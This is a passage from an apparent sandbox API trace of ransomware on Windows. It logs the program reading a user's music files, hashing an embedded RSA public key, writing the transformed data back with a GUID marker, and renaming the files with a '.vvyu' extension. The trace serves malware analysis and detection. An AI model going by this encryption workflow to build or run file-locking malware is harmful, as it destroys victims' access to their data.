HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.152] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x8e54, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x8e54, lpOverlapped=0x0) returned 1 [0203.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.153] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x8e59, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.153] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.154] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.155] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.155] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.155] CloseHandle (hObject=0x510) returned 1 [0203.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0203.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.168] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\2wJfI-R ZYJEjLJl_Hmt.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\2wjfi-r zyjejljl_hmt.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\2wJfI-R ZYJEjLJl_Hmt.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\2wjfi-r zyjejljl_hmt.mp3.vvyu")) returned 1 [0203.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.169] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0203.174] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ef0710, ftCreationTime.dwHighDateTime=0x1d89e2a, ftLastAccessTime.dwLowDateTime=0xa8aa39e0, ftLastAccessTime.dwHighDateTime=0x1d8a3a1, ftLastWriteTime.dwLowDateTime=0xa8aa39e0, ftLastWriteTime.dwHighDateTime=0x1d8a3a1, nFileSizeHigh=0x0, nFileSizeLow=0xec73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4GN5BaMTH.m4a", cAlternateFileName="4GN5BA~1.M4A")) returned 1 [0203.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0203.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.174] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\4GN5BaMTH.m4a") returned=".m4a" [0203.174] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\4GN5BaMTH.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\4gn5bamth.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.175] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=60531) returned 1 [0203.175] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.179] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xec4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.179] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.181] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.181] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xec73, lpOverlapped=0x0) returned 1 [0203.182] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.182] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.182] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.182] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0203.183] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.183] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.183] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.183] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.183] GetLastError () returned 0x0 [0203.183] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.183] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0203.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.184] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.184] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.184] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xec70) returned 0x2ea99b0 [0203.184] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1e28 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1e70 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.185] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3770 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3758 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0203.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.189] GetCurrentThreadId () returned 0x66c [0203.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3a80 [0203.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0203.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.190] GetCurrentThreadId () returned 0x66c [0203.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0203.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0203.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3770 [0203.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0203.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37d0 [0203.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0203.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37e8 [0203.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3788 [0203.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0203.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0203.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3758 [0203.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0203.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0203.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0203.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | 